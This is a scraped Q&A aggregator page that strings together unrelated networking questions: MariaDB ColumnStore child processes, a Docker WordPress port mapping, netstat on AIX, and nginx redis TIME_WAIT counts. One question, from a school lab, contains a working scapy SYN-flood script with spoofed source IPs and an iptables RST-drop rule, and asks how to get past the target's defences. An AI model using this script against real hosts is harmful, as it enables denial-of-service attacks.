Develop Reference

MariaDB with ColumnStore spawns a lot of child processes

I'm having a strange issue with a MariaDB Community 10.6 with ColumnStore installation running on a Ubuntu 20.04.
After I start the server and my application begins sending queries to it, the process ExeMgr seems to spawn an infinity number of child processes. It keeps growing and growing and all of them has a TCP connection with the MariaDb process, which is kind of expected, since MariaDB redirects the query to the ColumnStore engine. It's worth mentioning that there are SELECT, INSERT, UPDATE and DELETE instructions going into the ColumnStore engine.
This is the output of the netstat command:
. . .
# netstat -anp | grep ExeMgr
tcp 0 0 0.0.0.0:8601 0.0.0.0:* LISTEN 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10090 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:62000 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:11230 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61200 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60304 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60892 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61992 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61038 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61410 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:11680 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60838 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61226 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60474 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:12740 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10986 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10886 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61332 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10068 ESTABLISHED 89497/ExeMgr
. . .
And this is the output of the command pstree. At the moment when I took it, there were already 480 ExeMgr subprocesses running:
My application is a NodeJS application and it does have a connection pool. But we are working with a max number of 5 connections. When I run the commando show processlist I can see only 5 connections as expected.
Has anyone faced this problem? Maybe it is some kind of bug or a configuration that I missed appyling on the server?
Thanks for any help!

Ubuntu server limits to 5 SYN_RECV

For a school project I'm trying to do a DOS on an Ubuntu server (18.04) using Ubuntu desktop 18.04 with scapy. They are both placed as VM on VirtualBox.
On server side I have a python SimpleHTTPServer on port 80 that is pingable and reachable via browser by the desktop machine.
I'm trying to DoSing it using this code:
#!/usr/bin/env python
import socket, random, sys
from scapy.all import *
def sendSYN(target, port):
#creating packet
# insert IP header fields
tcp = TCP()
ip = IP()
#set source IP as random valid IP
ip.src = "%i.%i.%i.%i" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))
ip.dst = target
# insert TCP header fields
tcp = TCP()
#set source port as random valid port
tcp.sport = random.randint(1,65535)
tcp.dport = port
#set SYN flag
tcp.flags = 'S'
send(ip/tcp)
return ;
#control arguments
if len(sys.argv) != 3:
print("Few argument: %s miss IP or miss PORT" % sys.argv[0])
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
count = 0
print("Launch SYNFLOOD attack at %s:%i with SYN packets." % (target, port))
while 1:
#call SYNFlood attack
sendSYN(target,port)
count += 1
print("Total packets sent: %i" % count)
print("==========================================")
that basically sends an infinite number of SYN requests to the target machine on the user specified port. Its usage is: sudo python pythonDOS.py <target IP> <target port>.
Before launching this I do sudo iptables -A OUTPUT -p tcp -s <attacker IP> RST RST -j DROP on the attacking machine, to prevent the kernel to send RST request.
The attack seems to work: on wireshark on the attacker machine I can see that packets are sent correctly, but the server doesn't go down.
Running a netstat -antp | grep 80 on the target server I obtain this output:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 138.221.76.4:24171 SYN_RECV -
tcp 0 0 192.168.1.51:80 164.253.235.187:64186 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
and if I rerun the command after few seconds:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 100.58.218.121:10306 SYN_RECV -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 47.206.177.213:39759 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
it seems that the server can handle a maximum of 5 SYN_RECV although I'm doing hundreds of these requests with the attacker machine, so I think this is why I can't DOS the server. The ufw is disabled. My objective is to disable or understand what's happening on the server and disable it in order to perform the DOS attack.
Any help is appreciated, thanks in advance.
UPDATE: I installed tshark on the target server and from that I can see that all the packets I'm sending are received on the server, so they are no lost in communication between the two virtual machines. Also running netstat -i I can see that there are no RX_DROP.

Cannot connect to Wordpress docker container.on google cloud platform

Ok so I have read the other connecting to docker container questions and mine does not seem to fit any of the other ones. So here it goes. I have installed docker and docker compose. I built the Wordpress site on a my home machine and am not trying to migrate it to GCP. I got a micro instance and installed everything on there and as far as I can tell everything is up and running as it should be. But when I go to log into the site from the web browser I get -
**This site can’t be reached
xx.xxx.xx.xx refused to connect.
Try:
Checking the connection
Checking the proxy and the firewall
ERR_CONNECTION_REFUSED**
these are the ports opened up in my .yml file
- "8000:80"</b>
- "443"</b>
- "22"</b>
I have also tried 8080:80 and 80:80 to no availe
and when I check docker port it shows
80/tcp -> 0.0.0.0:32770</br>
80/tcp -> 0.0.0.0:8000</br>
22/tcp -> 0.0.0.0:32771</br>
443/tcp -> 0.0.0.0:443</br>
and when I check netstat from localhost and from another machine I get
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:17600 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:17603 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:17500 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 :::17500 :::* LISTEN -
udp 0 0 0.0.0.0:49953 0.0.0.0:* -
udp 22720 0 0.0.0.0:56225 0.0.0.0:* -
udp 52224 0 127.0.1.1:53 0.0.0.0:* -
udp 19584 0 0.0.0.0:68 0.0.0.0:* -
udp 46080 0 0.0.0.0:17500 0.0.0.0:* -
udp 214144 0 0.0.0.0:17500 0.0.0.0:* -
udp 35072 0 0.0.0.0:5353 0.0.0.0:* -
udp 9216 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp6 0 0 :::44824 :::* -
udp6 16896 0 :::5353 :::* -
udp6 3840 0 :::5353 :::*
-
when I run docker ps I get:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS
NAMES
1c25a8707960 wordpress:latest "docker-entrypoint.s…" 37 minutes ago Up 37 minutes 0.0.0.0:443->443/
tcp, 0.0.0.0:32771->22/tcp, 0.0.0.0:8000->80/tcp, 0.0.0.0:32770->80/tcp wp-site_wordpress_1
96f3c136c746 mysql:5.7 "docker-entrypoint.s…" 37 minutes ago Up 37 minutes 3306/tcp
wp-site_wp-db_1
Also I have both http and https open on my google cloud firewall.
So if I am listening on port 80 and have it mapped to 8000(the port I was connecting to the container on on my dev machine) I do not understand why I can not get to the WP site in the browser. Any help would be greatly appreciated. Also I think I included everything needed for this question. If there is anything else I will be more than happy to post it .

Ok so after a lot of tries I finally figured it out. In the yml file I needed to take out port -"80" and change -"8000:80" to -"80:80" and then remove the old containers and rebuild them.

netstat for AIX 6.1

is there a way to grep for network status based on pid on an AIX Box?
I'd like to know if there is a reasonable equivalent of this command below
netstat -anp | grep 2767
tcp 0 0 :::47801 :::* LISTEN 2767/java
tcp 0 0 :::33830 :::* LISTEN 2767/java
tcp 0 0 :::8009 :::* LISTEN 2767/java
tcp 0 0 :::8080 :::* LISTEN 2767/java
tcp 0 0 ::ffff:15.213.27.40:60373 ::ffff:15.213.27.21:22 ESTABLISHED 2767/java
tcp 0 0 ::ffff:15.213.27.40:35040 ::ffff:15.213.27.99:22 ESTABLISHED 2767/java
2767 being the processId

nginx redis upstream lots of TIME_WAIT to some servers after adding a new bunch to upstream

I have nginx upstream of redis servers (5 servers with 4 redis instances on every) like following:
upstream redis_cluster {
server 10.0.1.8:6379 fail_timeout=0;
server 10.0.1.8:6380 fail_timeout=0;
server 10.0.1.8:6381 fail_timeout=0;
server 10.0.1.8:6382 fail_timeout=0;
server 10.0.1.6:6379 fail_timeout=0;
server 10.0.1.6:6380 fail_timeout=0;
server 10.0.1.6:6381 fail_timeout=0;
server 10.0.1.6:6382 fail_timeout=0;
...
keepalive 16;
}
After adding the last one server (last 4 redis instances, actually), I've noticed strange connections rise to some of them:
9684 10.0.0.17:6379 TIME_WAIT
3 10.0.0.17:6380 ESTABLISHED
9677 10.0.0.17:6380 TIME_WAIT
9664 10.0.0.17:6381 TIME_WAIT
6 10.0.0.17:6382 ESTABLISHED
9660 10.0.0.17:6382 TIME_WAIT
4 10.0.1.3:6379 ESTABLISHED
1 10.0.1.3:6379 SYN_SENT
9671 10.0.1.3:6379 TIME_WAIT
3 10.0.1.3:6380 ESTABLISHED
9665 10.0.1.3:6380 TIME_WAIT
1 10.0.1.3:6381 ESTABLISHED
9661 10.0.1.3:6381 TIME_WAIT
5 10.0.1.3:6382 ESTABLISHED
9660 10.0.1.3:6382 TIME_WAIT
5 10.0.0.7:6379 ESTABLISHED
9653 10.0.0.7:6379 TIME_WAIT
4 10.0.0.7:6380 ESTABLISHED
9663 10.0.0.7:6380 TIME_WAIT
1 10.0.0.7:6381 ESTABLISHED
9664 10.0.0.7:6381 TIME_WAIT
7 10.0.0.7:6382 ESTABLISHED
9667 10.0.0.7:6382 TIME_WAIT
5 10.0.1.8:6379 ESTABLISHED
9673 10.0.1.8:6379 TIME_WAIT
2 10.0.1.8:6380 ESTABLISHED
9676 10.0.1.8:6380 TIME_WAIT
4 10.0.1.8:6381 ESTABLISHED
9665 10.0.1.8:6381 TIME_WAIT
3 10.0.1.8:6382 ESTABLISHED
While after commenting out a last one server (last 4 upstream entries) everything came to normal:
4 10.0.0.10:6379 ESTABLISHED
4 10.0.0.10:6380 ESTABLISHED
4 10.0.0.10:6381 ESTABLISHED
1 10.0.0.10:6381 TIME_WAIT
4 10.0.0.10:6382 ESTABLISHED
4 10.0.1.3:6379 ESTABLISHED
4 10.0.1.3:6380 ESTABLISHED
4 10.0.1.3:6381 ESTABLISHED
4 10.0.1.3:6382 ESTABLISHED
4 10.0.0.7:6379 ESTABLISHED
4 10.0.0.7:6380 ESTABLISHED
4 10.0.0.7:6381 ESTABLISHED
4 10.0.0.7:6382 ESTABLISHED
4 10.0.1.8:6379 ESTABLISHED
4 10.0.1.8:6380 ESTABLISHED
4 10.0.1.8:6381 ESTABLISHED
4 10.0.1.8:6382 ESTABLISHED
What could be the root cause of this? Thanks in advance, comrades.